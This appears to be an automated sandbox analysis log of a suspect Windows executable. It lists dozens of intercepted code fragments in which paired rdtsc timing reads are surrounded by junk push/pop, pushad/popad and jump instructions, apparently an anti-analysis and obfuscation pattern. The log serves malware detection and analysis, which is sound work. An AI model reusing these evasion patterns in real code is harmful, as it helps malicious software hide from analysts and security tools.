Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CD8614 second address: CD8645 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F953D46ED96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jo 00007F953D46ED96h 0x00000011 jmp 00007F953D46EDA8h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 popad 0x00000019 pushad 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CD8645 second address: CD864B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CD8791 second address: CD8797 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: C9DE33 second address: C9DE61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D015240h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d jmp 00007F953D015243h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: C9DE61 second address: C9DE67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CD8EF8 second address: CD8F18 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F953D015244h 0x00000008 jmp 00007F953D01523Ch 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 jng 00007F953D015236h 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CD9081 second address: CD9087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CD9087 second address: CD9090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CD9090 second address: CD9096 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CD9096 second address: CD90A2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 js 00007F953D015236h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CDA5ED second address: CDA5F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CDA5F1 second address: CDA5F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CDBD8D second address: CDBDA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jnl 00007F953D46ED96h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CDBDA3 second address: CDBDCF instructions: 0x00000000 rdtsc 0x00000002 jno 00007F953D015245h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d ja 00007F953D015238h 0x00000013 push eax 0x00000014 push edx 0x00000015 jbe 00007F953D015236h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CDBEE3 second address: CDBEE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CDBEE8 second address: CDBEEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CA48CE second address: CA4901 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F953D46ED9Dh 0x0000000b jmp 00007F953D46EDA7h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jng 00007F953D46ED96h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CA4901 second address: CA490B instructions: 0x00000000 rdtsc 0x00000002 jc 00007F953D015236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE3F32 second address: CE3F42 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push esi 0x00000004 pop esi 0x00000005 jl 00007F953D46ED96h 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE5C32 second address: CE5C4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F953D46EDA0h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE5E0F second address: CE5E39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F953D015238h 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F953D015249h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE5E39 second address: CE5E70 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F953D46EDA4h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 jmp 00007F953D46EDA7h 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE5F56 second address: CE5F62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE603A second address: CE603E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE6637 second address: CE663B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE663B second address: CE663F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE663F second address: CE66C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007F953D015238h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 mov edx, dword ptr [ebp+122D2939h] 0x0000002a push 0000001Eh 0x0000002c call 00007F953D015245h 0x00000031 mov ecx, dword ptr [ebp+122D2DDBh] 0x00000037 pop edi 0x00000038 mov dword ptr [ebp+12461D87h], ecx 0x0000003e nop 0x0000003f push edx 0x00000040 jnp 00007F953D01523Ch 0x00000046 pop edx 0x00000047 push eax 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b jmp 00007F953D015240h 0x00000050 jmp 00007F953D01523Dh 0x00000055 popad 0x00000056 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE66C7 second address: CE66E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F953D46EDA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE6A2C second address: CE6ABE instructions: 0x00000000 rdtsc 0x00000002 jg 00007F953D015236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F953D015249h 0x0000000f popad 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007F953D015238h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 00000014h 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b mov edx, 29FA69AAh 0x00000030 mov edi, dword ptr [ebp+122D2BE4h] 0x00000036 lea eax, dword ptr [ebp+1248F60Ah] 0x0000003c push 00000000h 0x0000003e push ebx 0x0000003f call 00007F953D015238h 0x00000044 pop ebx 0x00000045 mov dword ptr [esp+04h], ebx 0x00000049 add dword ptr [esp+04h], 00000018h 0x00000051 inc ebx 0x00000052 push ebx 0x00000053 ret 0x00000054 pop ebx 0x00000055 ret 0x00000056 mov dword ptr [ebp+122D30C2h], ebx 0x0000005c movzx edx, dx 0x0000005f nop 0x00000060 jmp 00007F953D01523Fh 0x00000065 push eax 0x00000066 push edi 0x00000067 pushad 0x00000068 push esi 0x00000069 pop esi 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE6ABE second address: CCE8A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 nop 0x00000007 mov edx, dword ptr [ebp+122D3075h] 0x0000000d lea eax, dword ptr [ebp+1248F5C6h] 0x00000013 mov edi, ecx 0x00000015 push eax 0x00000016 pushad 0x00000017 pushad 0x00000018 push edx 0x00000019 pop edx 0x0000001a jng 00007F953D46ED96h 0x00000020 popad 0x00000021 pushad 0x00000022 pushad 0x00000023 popad 0x00000024 push eax 0x00000025 pop eax 0x00000026 popad 0x00000027 popad 0x00000028 mov dword ptr [esp], eax 0x0000002b mov dword ptr [ebp+122D1C09h], ecx 0x00000031 call dword ptr [ebp+122D1847h] 0x00000037 pushad 0x00000038 push esi 0x00000039 pushad 0x0000003a popad 0x0000003b pop esi 0x0000003c jns 00007F953D46EDC2h 0x00000042 jnc 00007F953D46ED9Ch 0x00000048 popad 0x00000049 push eax 0x0000004a push edx 0x0000004b push edx 0x0000004c pushad 0x0000004d popad 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CCE8A1 second address: CCE8A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D237FF second address: D2380C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D2380C second address: D23810 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D23D5C second address: D23D60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D2400D second address: D24012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D24185 second address: D2418A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D233DC second address: D233E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D233E0 second address: D23402 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F953D46EDA8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D23402 second address: D23406 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D23406 second address: D23412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D23412 second address: D23416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D2D7D0 second address: D2D7DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007F953D46ED96h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D2C88D second address: D2C893 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D2C893 second address: D2C897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D2C897 second address: D2C8CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D01523Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F953D015248h 0x00000012 push eax 0x00000013 push edx 0x00000014 jbe 00007F953D015236h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D2C8CB second address: D2C8D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D2D28C second address: D2D297 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D2D297 second address: D2D2C0 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F953D46ED96h 0x00000008 jmp 00007F953D46EDA1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007F953D46ED96h 0x00000017 js 00007F953D46ED96h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D2FB3B second address: D2FB3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D2FB3F second address: D2FB50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46ED9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB0583 second address: CB059F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F953D015240h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D3248E second address: D32499 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D3683D second address: D36841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D36841 second address: D3685A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46EDA3h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D3685A second address: D368BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D015242h 0x00000007 jmp 00007F953D015242h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F953D015248h 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 ja 00007F953D015236h 0x0000001d popad 0x0000001e pushad 0x0000001f jno 00007F953D015236h 0x00000025 jmp 00007F953D01523Ch 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D3CF62 second address: D3CF68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D3B949 second address: D3B955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F953D015236h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D3BD2C second address: D3BD61 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 pop eax 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop esi 0x0000000c jmp 00007F953D46ED9Dh 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F953D46ED9Ah 0x00000019 push eax 0x0000001a jmp 00007F953D46ED9Dh 0x0000001f pop eax 0x00000020 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE63F1 second address: CE63F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE63F5 second address: CE6422 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46EDA4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F953D46EDA1h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE6422 second address: CE642C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F953D01523Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE642C second address: CE646C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 mov dword ptr [ebp+122D394Eh], edi 0x0000000d mov ebx, dword ptr [ebp+1248F605h] 0x00000013 movzx edi, cx 0x00000016 add eax, ebx 0x00000018 mov ecx, 1969E4C5h 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 jmp 00007F953D46EDA8h 0x00000026 jg 00007F953D46ED96h 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE646C second address: CE6472 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D3C2BB second address: D3C2D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F953D46ED96h 0x0000000a jns 00007F953D46ED96h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D3C2D0 second address: D3C2D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D3C2D4 second address: D3C2DA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D3C2DA second address: D3C2E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D3C2E6 second address: D3C2EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D4018D second address: D40191 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D404B1 second address: D404B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D40761 second address: D4076E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F953D015236h 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D408ED second address: D408F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D408F1 second address: D408F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D408F5 second address: D4091E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F953D46EDA9h 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D4091E second address: D40922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D46432 second address: D46441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F953D46ED96h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D46441 second address: D4644B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F953D015236h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D4644B second address: D46474 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F953D46ED96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007F953D46EDA2h 0x00000013 jg 00007F953D46ED9Ah 0x00000019 push edx 0x0000001a pop edx 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D46474 second address: D4648B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F953D015242h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D4648B second address: D46491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D46491 second address: D46497 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D465ED second address: D46609 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F953D46EDA4h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D468D3 second address: D468E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F953D01523Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D468E4 second address: D468F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 js 00007F953D46ED96h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D468F4 second address: D46910 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F953D015236h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d ja 00007F953D015236h 0x00000013 push edi 0x00000014 pop edi 0x00000015 push esi 0x00000016 pop esi 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
